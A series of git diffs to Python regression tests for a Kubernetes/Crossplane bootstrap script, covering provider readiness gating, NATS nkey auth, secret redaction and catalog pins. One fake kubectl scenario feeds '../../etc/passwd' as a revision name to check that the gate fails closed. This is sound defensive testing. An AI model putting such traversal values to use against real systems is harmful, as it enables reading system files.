+    "@sha256:a255cf284f333741429ca84d17382d890a2536dc921a8d8ef189e14e2e6fb767"
 )
 INITIAL_SCAFFOLD_COMMIT = "48d262e"
 
@@ -65,7 +65,7 @@ class BackstageImageProvenanceTest(unittest.TestCase):
             doc = fh.read()
         self.assertIn("core-portal", doc)
         self.assertNotIn("core-portal` | 48d262e", doc)
-        self.assertIn("b77e94a", doc)
+        self.assertIn("e87210b", doc)
 
 
 if __name__ == "__main__":

--- a/platform/tests/test_clean_bootstrap_runtime_regressions.py
+++ b/platform/tests/test_clean_bootstrap_runtime_regressions.py
@@ -79,7 +79,8 @@ class CrossplaneHarborOrderingTest(unittest.TestCase):
         body = func_body("wait_for_provider_http_ready")
         self.assertIn("provider-http", body)
         self.assertIn("ProviderRevision", body)
-        self.assertIn("Healthy", body)
+        self.assertIn("RevisionHealthy", body)
+        self.assertIn("RuntimeHealthy", body)
         self.assertIn("requests.http.crossplane.io", body)
         self.assertIn("condition=Established", body)
         loop = func_body("sync_gated_apps_for_local_dev")
@@ -137,7 +138,16 @@ class ProviderHttpRawApiGateTest(unittest.TestCase):
     CRDs install and then fails with a generic (non-NotFound) error that
     never recovers -- this is exactly what stalled runtime-v8 stdout5 right
     after crossplane-provider-configs went Healthy. The gate must instead
-    hit the pinned pkg.crossplane.io/v1 raw API directly."""
+    hit the pinned pkg.crossplane.io/v1 raw API directly.
+
+    runtime-v9: a ProviderRevision never carries a bare `Healthy` condition
+    -- Crossplane v2.3.3's revision reconciler
+    (internal/controller/pkg/revision/reconciler.go) only ever marks
+    `RevisionHealthy`/`RuntimeHealthy` on the revision itself; the aggregate
+    `Healthy` condition is written to the parent Provider by the manager
+    reconciler's `PackageHealth()` (apis/pkg/v1/conditions.go). Checking for
+    `Healthy` on the revision therefore never matched anything and stalled
+    every clean bootstrap for the full 180-attempt/360s timeout."""
 
     FAKE_KUBECTL = (
         "#!/usr/bin/env python3\n"
@@ -180,6 +190,10 @@ class ProviderHttpRawApiGateTest(unittest.TestCase):
         "    if scenario == 'oversized_revision_label':\n"
         "        sys.stdout.write(json.dumps({'status': {'currentRevision': 'a' * 64}}))\n"
         "        sys.exit(0)\n"
+        "    unhealthy_revision_scenarios = ('missing_runtime_healthy', 'false_runtime_healthy', 'missing_revision_healthy', 'false_revision_healthy')\n"
+        "    if scenario in unhealthy_revision_scenarios and n >= 2:\n"
+        "        sys.stderr.write('Error from server (Forbidden): cannot get providers.pkg.crossplane.io: revision-unhealthy-retry-sentinel\\n')\n"
+        "        sys.exit(1)\n"
         "    sys.stdout.write(json.dumps({'status': {'currentRevision': 'provider-http-abc123def456'}}))\n"
         "    sys.exit(0)\n"
         "if path.startswith('/apis/pkg.crossplane.io/v1/providerrevisions/'):\n"
@@ -187,7 +201,19 @@ class ProviderHttpRawApiGateTest(unittest.TestCase):
         "    if scenario == 'revision_not_found_then_success' and n < 3:\n"
         "        sys.stderr.write('Error from server (NotFound): providerrevisions.pkg.crossplane.io \"x\" not found\\n')\n"
         "        sys.exit(1)\n"
-        "    sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'Healthy', 'status': 'True'}]}}))\n"
+        "    if scenario == 'missing_runtime_healthy':\n"
+        "        sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'RevisionHealthy', 'status': 'True'}]}}))\n"
+        "        sys.exit(0)\n"
+        "    if scenario == 'false_runtime_healthy':\n"
+        "        sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'RevisionHealthy', 'status': 'True'}, {'type': 'RuntimeHealthy', 'status': 'False'}]}}))\n"
+        "        sys.exit(0)\n"
+        "    if scenario == 'missing_revision_healthy':\n"
+        "        sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'RuntimeHealthy', 'status': 'True'}]}}))\n"
+        "        sys.exit(0)\n"
+        "    if scenario == 'false_revision_healthy':\n"
+        "        sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'RevisionHealthy', 'status': 'False'}, {'type': 'RuntimeHealthy', 'status': 'True'}]}}))\n"
+        "        sys.exit(0)\n"
+        "    sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'RevisionHealthy', 'status': 'True'}, {'type': 'RuntimeHealthy', 'status': 'True'}]}}))\n"
         "    sys.exit(0)\n"
         "sys.exit(2)\n"
     )
@@ -244,6 +270,32 @@ class ProviderHttpRawApiGateTest(unittest.TestCase):
         result, elapsed, _calls = self._run("revision_not_found_then_success")
         self.assertEqual(result.returncode, 0, result.stderr)
         self.assertGreaterEqual(elapsed, 3.5)
+
+    def test_missing_or_false_provider_revision_conditions_never_reach_crd_success(self):
+        """Neither a missing nor a False RevisionHealthy/RuntimeHealthy condition
+        may ever be treated as ready. The fake fails the *next* provider read
+        once the gate has observed one unhealthy revision, so each scenario
+        resolves in a single retry cycle instead of exhausting the real
+        180-attempt/360s loop."""
+        scenarios = (
+            "missing_runtime_healthy",
+            "false_runtime_healthy",
+            "missing_revision_healthy",
+            "false_revision_healthy",
+        )
+        for scenario in scenarios:
+            with self.subTest(scenario=scenario):
+                result, elapsed, calls = self._run(scenario, timeout=10)
+                self.assertNotEqual(result.returncode, 0, result.stdout + result.stderr)
+                self.assertLess(
+                    elapsed, 5,
+                    "must fail closed after one retry rather than exhausting the 180-attempt/360s loop",
+                )
+                wait_calls = [c for c in calls if c and c[0] == "wait"]
+                self.assertEqual(
+                    wait_calls, [],
+                    "must never reach the CRD Established wait when provider-http is not fully healthy",
+                )
 
     def test_provider_forbidden_fails_fast_without_leaking_credential(self):
         result, elapsed, _calls = self._run("provider_forbidden")

--- a/platform/tests/test_clean_bootstrap_runtime_regressions.py
+++ b/platform/tests/test_clean_bootstrap_runtime_regressions.py
@@ -86,6 +86,48 @@ class CrossplaneHarborOrderingTest(unittest.TestCase):
         loop = func_body("sync_gated_apps_for_local_dev")
         self.assertLess(loop.index("wait_for_provider_http_ready"), loop.index("kubectl patch application $app"))
 
+    def test_harbor_bootstrap_waits_for_ca_before_sync_without_depending_on_harbor_app(self):
+        """Issue #285 runtime-v10: `crossplane-harbor-bootstrap` was promoted
+        by this gated loop before Phase 3 (main up) had copied the
+        digiorg.local CA into crossplane-system, so `Request
+        harbor-crossplane-system-robot` went OutOfSync/Synced=False with
+        ReconcileError: missing crossplane-system/digiorg-local-ca. The
+        branch that gates this Application must wait only for cert-manager
+        itself (never the not-yet-synced Harbor Application -- that would
+        deadlock on Harbor's own PostSync hooks) and its Certificate, then
+        copy the CA, then run the existing provider-http gate, in that exact
+        order, before this Application is patched to sync."""
+        body = func_body("sync_gated_apps_for_local_dev")
+        branch_start = body.index('if $app == "crossplane-harbor-bootstrap"')
+        branch_end = body.index("mut exists = false", branch_start)
+        branch = body[branch_start:branch_end]
+
+        self.assertIn("wait_for_configuration_dependencies", branch)
+        self.assertIn('copy_digiorg_local_ca_to_namespace "crossplane-system"', branch)
+        self.assertIn("wait_for_provider_http_ready", branch)
+
+        dependency_pos = branch.index("wait_for_configuration_dependencies")
+        copy_pos = branch.index('copy_digiorg_local_ca_to_namespace "crossplane-system"')
+        provider_pos = branch.index("wait_for_provider_http_ready")
+        self.assertLess(
+            dependency_pos, copy_pos,
+            "must wait for cert-manager/its Certificate before copying the CA",
+        )
+        self.assertLess(
+            copy_pos, provider_pos,
+            "must copy the CA before the existing provider-http gate runs",
+        )
+
+        dependency_call = branch[dependency_pos:copy_pos]
+        self.assertIn('"cert-manager"', dependency_call)
+        self.assertIn('"digiorg-local-ca"', dependency_call)
+        self.assertNotIn(
+            '"harbor"', dependency_call,
+            "must never wait on the not-yet-synced Harbor Application -- "
+            "that would deadlock on Harbor's own PostSync hooks",
+        )
+
+
     def test_gate_fails_fast_and_redacts_deterministic_kubectl_failures(self):
         scenarios = {
             "forbidden": (1, "", "Forbidden transport-secret-sentinel"),

--- a/platform/tests/test_clean_bootstrap_runtime_regressions.py
+++ b/platform/tests/test_clean_bootstrap_runtime_regressions.py
@@ -1,6 +1,7 @@
 #!/usr/bin/env python3
 """Regression contracts discovered by Issue #285 clean bootstrap run #6."""
 from pathlib import Path
+import json
 import os
 import re
 import subprocess
@@ -128,6 +129,153 @@ class CrossplaneHarborOrderingTest(unittest.TestCase):
         )
         self.assertEqual(not_found.returncode, 0, not_found.stderr)
         self.assertEqual(not_found.stdout.strip(), "true")
+
+
+class ProviderHttpRawApiGateTest(unittest.TestCase):
+    """PR #286: `kubectl get provider`/`providerrevision` resolves through
+    discovery/RESTMapper, which can be stale immediately after the package
+    CRDs install and then fails with a generic (non-NotFound) error that
+    never recovers -- this is exactly what stalled runtime-v8 stdout5 right
+    after crossplane-provider-configs went Healthy. The gate must instead
+    hit the pinned pkg.crossplane.io/v1 raw API directly."""
+
+    FAKE_KUBECTL = (
+        "#!/usr/bin/env python3\n"
+        "import json, os, sys\n"
+        "args = sys.argv[1:]\n"
+        "with open(os.environ['KUBECTL_ARGV_LOG'], 'a', encoding='utf-8') as log:\n"
+        "    log.write(json.dumps(args) + '\\n')\n"
+        "scenario = os.environ.get('FAKE_SCENARIO', 'healthy')\n"
+        "counter_path = os.environ['CALL_COUNTER']\n"
+        "def bump(key):\n"
+        "    counts = json.loads(open(counter_path, encoding='utf-8').read()) if os.path.exists(counter_path) else {}\n"
+        "    counts[key] = counts.get(key, 0) + 1\n"
+        "    open(counter_path, 'w', encoding='utf-8').write(json.dumps(counts))\n"
+        "    return counts[key]\n"
+        "if 'wait' in args:\n"
+        "    sys.exit(0)\n"
+        "if '--raw' not in args:\n"
+        "    sys.exit(2)\n"
+        "path = args[args.index('--raw') + 1]\n"
+        "if path.startswith('/apis/pkg.crossplane.io/v1/providers/'):\n"
+        "    n = bump('provider')\n"
+        "    if scenario == 'provider_not_found_then_success' and n < 3:\n"
+        "        sys.stderr.write('Error from server (NotFound): providers.pkg.crossplane.io \"provider-http\" not found\\n')\n"
+        "        sys.exit(1)\n"
+        "    if scenario == 'provider_forbidden':\n"
+        "        sys.stderr.write('Error from server (Forbidden): cannot get providers.pkg.crossplane.io: Authorization: Bearer ' + os.environ['SENTINEL'] + '\\n')\n"
+        "        sys.exit(1)\n"
+        "    if scenario == 'credential_helper_not_found':\n"
+        "        sys.stderr.write('error: getting credentials: exec: executable credential-helper not found: secret=' + os.environ['SENTINEL'] + '\\n')\n"
+        "        sys.exit(1)\n"
+        "    if scenario == 'provider_huge_stderr':\n"
+        "        sys.stderr.write('z' * 5000)\n"
+        "        sys.exit(1)\n"
+        "    if scenario == 'provider_malformed_json':\n"
+        "        sys.stdout.write('{not-json')\n"
+        "        sys.exit(0)\n"
+        "    if scenario == 'invalid_revision_name':\n"
+        "        sys.stdout.write(json.dumps({'status': {'currentRevision': '../../etc/passwd'}}))\n"
+        "        sys.exit(0)\n"
+        "    if scenario == 'oversized_revision_label':\n"
+        "        sys.stdout.write(json.dumps({'status': {'currentRevision': 'a' * 64}}))\n"
+        "        sys.exit(0)\n"
+        "    sys.stdout.write(json.dumps({'status': {'currentRevision': 'provider-http-abc123def456'}}))\n"
+        "    sys.exit(0)\n"
+        "if path.startswith('/apis/pkg.crossplane.io/v1/providerrevisions/'):\n"
+        "    n = bump('revision')\n"
+        "    if scenario == 'revision_not_found_then_success' and n < 3:\n"
+        "        sys.stderr.write('Error from server (NotFound): providerrevisions.pkg.crossplane.io \"x\" not found\\n')\n"
+        "        sys.exit(1)\n"
+        "    sys.stdout.write(json.dumps({'spec': {'desiredState': 'Active'}, 'status': {'conditions': [{'type': 'Healthy', 'status': 'True'}]}}))\n"
+        "    sys.exit(0)\n"
+        "sys.exit(2)\n"
+    )
+
+    def _run(self, scenario, sentinel="sentinel-http-credential-value", timeout=15):
+        with tempfile.TemporaryDirectory() as tmp:
+            fake = Path(tmp) / "kubectl"
+            fake.write_text(self.FAKE_KUBECTL, encoding="utf-8")
+            fake.chmod(0o755)
+            argv_log = Path(tmp) / "argv.log"
+            counter = Path(tmp) / "counter.json"
+            env = os.environ.copy()
+            env["PATH"] = tmp + os.pathsep + env.get("PATH", "")
+            env["KUBECTL_ARGV_LOG"] = str(argv_log)
+            env["CALL_COUNTER"] = str(counter)
+            env["FAKE_SCENARIO"] = scenario
+            env["SENTINEL"] = sentinel
+            started = time.monotonic()
+            result = subprocess.run(
+                ["nu", "-c", f"source {ROOT / 'scripts/local-setup.nu'}; wait_for_provider_http_ready"],
+                capture_output=True,
+                text=True,
+                env=env,
+                timeout=timeout,
+            )
+            elapsed = time.monotonic() - started
+            calls = [json.loads(line) for line in argv_log.read_text(encoding="utf-8").splitlines()] if argv_log.exists() else []
+            return result, elapsed, calls
+
+    def test_uses_exact_raw_v1_paths_for_provider_and_revision(self):
+        result, _elapsed, calls = self._run("healthy")
+        self.assertEqual(result.returncode, 0, result.stderr)
+        raw_paths = [c[c.index("--raw") + 1] for c in calls if "--raw" in c]
+        self.assertIn("/apis/pkg.crossplane.io/v1/providers/provider-http", raw_paths)
+        self.assertIn(
+            "/apis/pkg.crossplane.io/v1/providerrevisions/provider-http-abc123def456",
+            raw_paths,
+        )
+        for call in calls:
+            if "get" in call:
+                self.assertIn("--raw", call, "must never resolve provider/providerrevision via discovery/RESTMapper")
+        wait_calls = [c for c in calls if c and c[0] == "wait"]
+        self.assertEqual(
+            wait_calls,
+            [["wait", "--for=condition=Established", "crd/requests.http.crossplane.io", "--timeout=5s"]],
+        )
+
+    def test_provider_not_found_retries_then_succeeds(self):
+        result, elapsed, _calls = self._run("provider_not_found_then_success")
+        self.assertEqual(result.returncode, 0, result.stderr)
+        self.assertGreaterEqual(elapsed, 3.5)
+
+    def test_revision_not_found_retries_then_succeeds(self):
+        result, elapsed, _calls = self._run("revision_not_found_then_success")
+        self.assertEqual(result.returncode, 0, result.stderr)
+        self.assertGreaterEqual(elapsed, 3.5)
+
+    def test_provider_forbidden_fails_fast_without_leaking_credential(self):
+        result, elapsed, _calls = self._run("provider_forbidden")
+        self.assertNotEqual(result.returncode, 0)
+        self.assertLess(elapsed, 3)
+        self.assertNotIn("sentinel-http-credential-value", result.stdout + result.stderr)
+
+    def test_credential_helper_not_found_fails_fast_without_leaking_credential(self):
+        result, elapsed, _calls = self._run("credential_helper_not_found")
+        self.assertNotEqual(result.returncode, 0)
+        self.assertLess(elapsed, 3)
+        self.assertNotIn("sentinel-http-credential-value", result.stdout + result.stderr)
+
+    def test_malformed_json_fails_fast(self):
+        result, elapsed, _calls = self._run("provider_malformed_json")
+        self.assertNotEqual(result.returncode, 0)
+        self.assertLess(elapsed, 3)
+
+    def test_invalid_revision_name_fails_closed_without_querying_revision(self):
+        for scenario in ("invalid_revision_name", "oversized_revision_label"):
+            with self.subTest(scenario=scenario):
+                result, elapsed, calls = self._run(scenario)
+                self.assertNotEqual(result.returncode, 0)
+                self.assertLess(elapsed, 3)
+                raw_paths = [c[c.index("--raw") + 1] for c in calls if "--raw" in c]
+                self.assertFalse(any("providerrevisions" in p for p in raw_paths))
+
+    def test_fatal_diagnostic_is_bounded_even_without_a_redactable_pattern(self):
+        result, elapsed, _calls = self._run("provider_huge_stderr")
+        self.assertNotEqual(result.returncode, 0)
+        self.assertLess(elapsed, 3)
+        self.assertLess(len(result.stderr), 2000)
 
 
 class GiteaServiceIdentityTest(unittest.TestCase):

--- a/platform/tests/test_clean_bootstrap_runtime_regressions.py
+++ b/platform/tests/test_clean_bootstrap_runtime_regressions.py
@@ -1,0 +1,127 @@
+#!/usr/bin/env python3
+"""Regression contracts discovered by Issue #285 clean bootstrap run #6."""
+from pathlib import Path
+import re
+import unittest
+import yaml
+
+ROOT = Path(__file__).resolve().parents[2]
+SETUP = (ROOT / "scripts/local-setup.nu").read_text(encoding="utf-8")
+NATS_VALUES = yaml.safe_load((ROOT / "platform/base/nats/values.yaml").read_text(encoding="utf-8"))
+NACK_APP = yaml.safe_load((ROOT / "apps/platform/nats-jetstream-controller.yaml").read_text(encoding="utf-8"))
+HARBOR_APP = yaml.safe_load((ROOT / "apps/platform/crossplane-harbor-bootstrap.yaml").read_text(encoding="utf-8"))
+
+
+def func_body(name: str) -> str:
+    start = SETUP.index(f"def {name} [")
+    next_def = SETUP.find("\ndef ", start + 5)
+    return SETUP[start:] if next_def < 0 else SETUP[start:next_def]
+
+
+class NatsControllerAuthenticationTest(unittest.TestCase):
+    SECRET = "nats-jetstream-controller-nkey"
+
+    def test_nats_server_uses_dedicated_least_privilege_public_nkey(self):
+        merge = NATS_VALUES["config"]["merge"]
+        users = merge["accounts"]["APP"]["users"]
+        controller = next(u for u in users if "nkey" in u)
+        self.assertEqual(controller["nkey"], "<< $NATS_JSC_NKEY_PUBLIC >>")
+        self.assertEqual(controller["permissions"]["publish"], ["$JS.API.>"])
+        self.assertEqual(controller["permissions"]["subscribe"], ["_INBOX.>"])
+        env = NATS_VALUES["container"]["merge"]["env"]
+        item = next(e for e in env if e["name"] == "NATS_JSC_NKEY_PUBLIC")
+        ref = item["valueFrom"]["secretKeyRef"]
+        self.assertEqual(ref, {"name": self.SECRET, "key": "public.nk"})
+
+    def test_nack_mounts_private_seed_from_matching_secret(self):
+        values = yaml.safe_load(NACK_APP["spec"]["source"]["helm"]["values"])
+        ref = values["jetstream"]["nats"]["nkey"]["secret"]
+        self.assertEqual(ref, {"name": self.SECRET, "key": "seed.nk"})
+        self.assertNotIn("password", NACK_APP["spec"]["source"]["helm"]["values"].lower())
+
+    def test_nack_cluster_role_cannot_read_kubernetes_secrets(self):
+        values = yaml.safe_load(NACK_APP["spec"]["source"]["helm"]["values"])
+        rules = yaml.safe_load(values["rbacRules"])["rules"]
+        secret_rules = [
+            rule for rule in rules
+            if rule.get("apiGroups") == [""] and "secrets" in rule.get("resources", [])
+        ]
+        self.assertEqual(secret_rules, [])
+        jetstream_rules = [rule for rule in rules if rule.get("apiGroups") == ["jetstream.nats.io"]]
+        self.assertEqual(len(jetstream_rules), 1)
+        self.assertIn("streams", jetstream_rules[0]["resources"])
+        self.assertIn("consumers", jetstream_rules[0]["resources"])
+
+    def test_bootstrap_generates_and_validates_nkey_with_pinned_tool_image(self):
+        body = func_body("ensure_nats_jetstream_controller_nkey")
+        self.assertIn("natsio/nats-box:0.19.2@sha256:8031d190c7ee24081f3f27cc939fb647a1eeb29ebb5c60fef9b5b6c7a846d6a2", body)
+        self.assertIn("nk -gen user", body)
+        self.assertIn("nk -inkey /dev/stdin -pubout", body)
+        self.assertIn('persist_opaque_secret "messaging" "nats-jetstream-controller-nkey" "seed.nk"', body)
+        self.assertIn('persist_opaque_secret "messaging" "nats-jetstream-controller-nkey" "public.nk"', body)
+        self.assertIn("ensure_nats_jetstream_controller_nkey", func_body("create_platform_namespaces_secrets"))
+        self.assertIn("if ($public | is-empty)", body)
+        self.assertIn('persist_opaque_secret "messaging" $name "public.nk" $derived', body)
+
+
+class CrossplaneHarborOrderingTest(unittest.TestCase):
+    def test_harbor_bootstrap_is_manual_and_gated_after_provider_configs(self):
+        self.assertNotIn("automated", HARBOR_APP["spec"].get("syncPolicy", {}))
+        gated = SETUP[SETUP.index("let gated_apps"):]
+        self.assertLess(gated.index('"crossplane-provider-configs"'), gated.index('"crossplane-harbor-bootstrap"'))
+        self.assertLess(gated.index('"crossplane-harbor-bootstrap"'), gated.index('"crossplane-xrds"'))
+
+    def test_gate_fails_closed_on_provider_revision_and_request_crd(self):
+        body = func_body("wait_for_provider_http_ready")
+        self.assertIn("provider-http", body)
+        self.assertIn("ProviderRevision", body)
+        self.assertIn("Healthy", body)
+        self.assertIn("requests.http.crossplane.io", body)
+        self.assertIn("condition=Established", body)
+        loop = func_body("sync_gated_apps_for_local_dev")
+        self.assertLess(loop.index("wait_for_provider_http_ready"), loop.index("kubectl patch application $app"))
+
+
+class GiteaServiceIdentityTest(unittest.TestCase):
+    def test_bool_flag_uses_equals_form(self):
+        body = func_body("gitea_create_user_random_password")
+        self.assertIn("--must-change-password=false", body)
+        self.assertNotIn("--must-change-password false", body)
+
+    def test_existing_service_users_have_must_change_unset_on_resume(self):
+        helper = func_body("gitea_unset_service_user_must_change_password")
+        self.assertIn("admin user must-change-password --unset", helper)
+        for function, username in (
+            ("configure_crossplane_gitea_credentials", "crossplane-provisioner"),
+            ("configure_argocd_gitea_access", "argocd-reader"),
+            ("configure_backstage_gitea_publisher", "backstage-appclaim-publisher"),
+        ):
+            body = func_body(function)
+            self.assertIn(f'gitea_unset_service_user_must_change_password $gitea_pod "{username}"', body)
+
+
+class SecretMetadataTest(unittest.TestCase):
+    def test_new_credential_writers_avoid_client_side_apply_and_scrub_annotation(self):
+        scrubber = func_body("scrub_secret_last_applied_annotation")
+        self.assertIn("kubectl.kubernetes.io/last-applied-configuration-", scrubber)
+        self.assertIn("jsonpath='{.metadata.annotations.kubectl", scrubber)
+
+        opaque = func_body("persist_opaque_secret")
+        self.assertIn("get secret", opaque)
+        self.assertIn("--ignore-not-found", opaque)
+        self.assertIn("get -o data", opaque)
+        self.assertIn("upsert $key $encoded", opaque)
+        self.assertIn("apply --server-side", opaque)
+        self.assertIn("--field-manager digiorg-bootstrap-secret", opaque)
+        self.assertNotRegex(opaque, r"(?<!server-side )apply -f -")
+        self.assertIn("scrub_secret_last_applied_annotation", opaque)
+
+        repo = func_body("persist_argocd_repo_secret")
+        self.assertIn("apply --server-side", repo)
+        self.assertIn("--field-manager", repo)
+        self.assertNotRegex(repo, r"(?<!server-side )apply -f -")
+        self.assertIn("scrub_secret_last_applied_annotation", repo)
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_clean_bootstrap_runtime_regressions.py
+++ b/platform/tests/test_clean_bootstrap_runtime_regressions.py
@@ -1,7 +1,11 @@
 #!/usr/bin/env python3
 """Regression contracts discovered by Issue #285 clean bootstrap run #6."""
 from pathlib import Path
+import os
 import re
+import subprocess
+import tempfile
+import time
 import unittest
 import yaml
 
@@ -81,6 +85,51 @@ class CrossplaneHarborOrderingTest(unittest.TestCase):
         loop = func_body("sync_gated_apps_for_local_dev")
         self.assertLess(loop.index("wait_for_provider_http_ready"), loop.index("kubectl patch application $app"))
 
+    def test_gate_fails_fast_and_redacts_deterministic_kubectl_failures(self):
+        scenarios = {
+            "forbidden": (1, "", "Forbidden transport-secret-sentinel"),
+            "credential-helper": (1, "", "error: executable credential-helper not found transport-secret-sentinel"),
+            "malformed": (0, "{not-json", ""),
+        }
+        for name, (code, stdout, stderr) in scenarios.items():
+            with self.subTest(name=name), tempfile.TemporaryDirectory() as tmp:
+                fake = Path(tmp) / "kubectl"
+                fake.write_text(
+                    "#!/usr/bin/env python3\n"
+                    "import sys\n"
+                    f"sys.stdout.write({stdout!r})\n"
+                    f"sys.stderr.write({stderr!r})\n"
+                    f"sys.exit({code})\n",
+                    encoding="utf-8",
+                )
+                fake.chmod(0o755)
+                env = os.environ.copy()
+                env["PATH"] = tmp + os.pathsep + env.get("PATH", "")
+                started = time.monotonic()
+                result = subprocess.run(
+                    ["nu", "-c", f"source {ROOT / 'scripts/local-setup.nu'}; wait_for_provider_http_ready"],
+                    capture_output=True,
+                    text=True,
+                    env=env,
+                    timeout=5,
+                )
+                self.assertNotEqual(result.returncode, 0)
+                self.assertLess(time.monotonic() - started, 3)
+                self.assertNotIn("transport-secret-sentinel", result.stdout + result.stderr)
+
+        not_found = subprocess.run(
+            [
+                "nu", "-c",
+                f"source {ROOT / 'scripts/local-setup.nu'}; "
+                "kubectl_result_is_not_found {stdout: '', stderr: 'Error from server (NotFound): provider-http not found'}",
+            ],
+            capture_output=True,
+            text=True,
+            timeout=5,
+        )
+        self.assertEqual(not_found.returncode, 0, not_found.stderr)
+        self.assertEqual(not_found.stdout.strip(), "true")
+
 
 class GiteaServiceIdentityTest(unittest.TestCase):
     def test_bool_flag_uses_equals_form(self):
@@ -109,12 +158,17 @@ class SecretMetadataTest(unittest.TestCase):
         opaque = func_body("persist_opaque_secret")
         self.assertIn("get secret", opaque)
         self.assertIn("--ignore-not-found", opaque)
-        self.assertIn("get -o data", opaque)
-        self.assertIn("upsert $key $encoded", opaque)
+        self.assertIn("data: {($key): $encoded}", opaque)
         self.assertIn("apply --server-side", opaque)
-        self.assertIn("--field-manager digiorg-bootstrap-secret", opaque)
+        self.assertIn("digiorg-bootstrap-secret-", opaque)
+        self.assertIn("--field-manager $field_manager", opaque)
         self.assertNotRegex(opaque, r"(?<!server-side )apply -f -")
-        self.assertIn("scrub_secret_last_applied_annotation", opaque)
+        self.assertGreaterEqual(opaque.count("scrub_secret_last_applied_annotation"), 2)
+        self.assertLess(
+            opaque.index("scrub_secret_last_applied_annotation"),
+            opaque.index("apply --server-side"),
+            "legacy last-applied annotation must be scrubbed before target-only SSA",
+        )
 
         repo = func_body("persist_argocd_repo_secret")
         self.assertIn("apply --server-side", repo)

--- a/platform/tests/test_clean_bootstrap_runtime_regressions.py
+++ b/platform/tests/test_clean_bootstrap_runtime_regressions.py
@@ -32,8 +32,7 @@ class NatsControllerAuthenticationTest(unittest.TestCase):
         self.assertEqual(controller["nkey"], "<< $NATS_JSC_NKEY_PUBLIC >>")
         self.assertEqual(controller["permissions"]["publish"], ["$JS.API.>"])
         self.assertEqual(controller["permissions"]["subscribe"], ["_INBOX.>"])
-        env = NATS_VALUES["container"]["merge"]["env"]
-        item = next(e for e in env if e["name"] == "NATS_JSC_NKEY_PUBLIC")
+        item = NATS_VALUES["container"]["env"]["NATS_JSC_NKEY_PUBLIC"]
         ref = item["valueFrom"]["secretKeyRef"]
         self.assertEqual(ref, {"name": self.SECRET, "key": "public.nk"})
 

--- a/platform/tests/test_crossplane_migration.py
+++ b/platform/tests/test_crossplane_migration.py
@@ -43,14 +43,14 @@ FUNCTION = os.path.join(PKG_DIR, "function-patch-and-transform.yaml")
 PROVIDER_KUSTOMIZATION = os.path.join(PKG_DIR, "kustomization.yaml")
 VERSIONS_DOC = os.path.join(REPO_ROOT, "docs", "guides", "platform-versions.md")
 
-# core-catalog PR #17 merged as this commit; a GitHub comparison shows it one
-# commit ahead of the old implementation SHA with NO changed files, and
-# core-catalog/main points at it. Pin the canonical *reviewed merge* commit for
-# traceability (Issue #281 Phase 4). Update this constant, the manifest, and the
-# versions doc together when the reviewed revision advances.
-CANONICAL_CATALOG_REVISION = "13b7a3b4a0b7a5f5e692dc6d5a3fa416852c4273"
-# The prior (non-canonical) implementation SHA must no longer be referenced.
-SUPERSEDED_CATALOG_REVISION = "4c30d9c3fa5c3c401c19f26b66a025854c65ee02"
+# core-catalog PR #18's exact independently reviewed Issue #285 head. Keep the
+# Core pin, manifest documentation, and this constant aligned. If GitHub creates
+# a different merge/squash commit, update all three before merging the Core PR.
+REVIEWED_CATALOG_REVISION = "7fd51323db2c38e7ca36f5496e22686a93aa9fc4"
+SUPERSEDED_CATALOG_REVISIONS = (
+    "13b7a3b4a0b7a5f5e692dc6d5a3fa416852c4273",
+    "4c30d9c3fa5c3c401c19f26b66a025854c65ee02",
+)
 
 # Revalidated compatible provider package versions (exact pins).
 EXPECTED_PROVIDERS = {
@@ -144,24 +144,25 @@ class XrdLegacyClusterCompatTest(unittest.TestCase):
                             "Namespaced scope drops Claims support in Crossplane v2")
 
 
-class CoreCatalogCanonicalPinTest(unittest.TestCase):
-    """core-catalog must pin the canonical reviewed merge commit, stay immutable,
-    and remain manually gated (Issue #281 Phase 4)."""
+class CoreCatalogReviewedRevisionPinTest(unittest.TestCase):
+    """Core must pin the exact reviewed Issue #285 PR #18 head and keep the
+    Catalog Application immutable and manually gated."""
 
     def setUp(self):
         self.app = _docs(CATALOG_APP)[0]
 
-    def test_pins_canonical_merge_commit(self):
+    def test_pins_reviewed_issue_285_pr_head(self):
         rev = str(self.app["spec"]["source"]["targetRevision"])
         self.assertEqual(
-            rev, CANONICAL_CATALOG_REVISION,
-            "core-catalog must pin the canonical reviewed merge commit",
+            rev, REVIEWED_CATALOG_REVISION,
+            "core-catalog must pin the exact reviewed Issue #285 PR #18 head",
         )
 
     def test_superseded_revision_not_referenced_anywhere(self):
         # The old implementation SHA must be gone from the manifest and the doc.
-        self.assertNotIn(SUPERSEDED_CATALOG_REVISION, _read(CATALOG_APP))
-        self.assertNotIn(SUPERSEDED_CATALOG_REVISION, _read(VERSIONS_DOC))
+        for revision in SUPERSEDED_CATALOG_REVISIONS:
+            self.assertNotIn(revision, _read(CATALOG_APP))
+            self.assertNotIn(revision, _read(VERSIONS_DOC))
 
     def test_revision_is_immutable_40_hex(self):
         rev = str(self.app["spec"]["source"]["targetRevision"])
@@ -178,11 +179,11 @@ class CoreCatalogCanonicalPinTest(unittest.TestCase):
             "issue-275-manual",
         )
 
-    def test_versions_doc_records_canonical_revision(self):
+    def test_versions_doc_records_reviewed_revision(self):
         # The reviewed revision must be documented so the pin is traceable.
-        self.assertIn(CANONICAL_CATALOG_REVISION,
+        self.assertIn(REVIEWED_CATALOG_REVISION,
                       _read(VERSIONS_DOC),
-                      "platform-versions.md must record the canonical catalog revision")
+                      "platform-versions.md must record the reviewed catalog revision")
 
 
 if __name__ == "__main__":

--- a/platform/tests/test_gitea_actions_runner.py
+++ b/platform/tests/test_gitea_actions_runner.py
@@ -1,0 +1,509 @@
+#!/usr/bin/env python3
+"""Gitea Actions runner (Issue #285 blocker #4): no act_runner existed at
+all, so no Gitea Actions workflow the platform generates (the CI/CD pipeline
+in core-catalog's pipeline.yaml, Issue #285 blockers #5/#6/#7) could ever
+actually execute.
+
+Locks:
+  * a pinned, functional act_runner Deployment (official gitea/act_runner
+    dind-rootless image -- a single container bundling act_runner + a
+    rootless dockerd, so CI jobs can build/push images without a separate
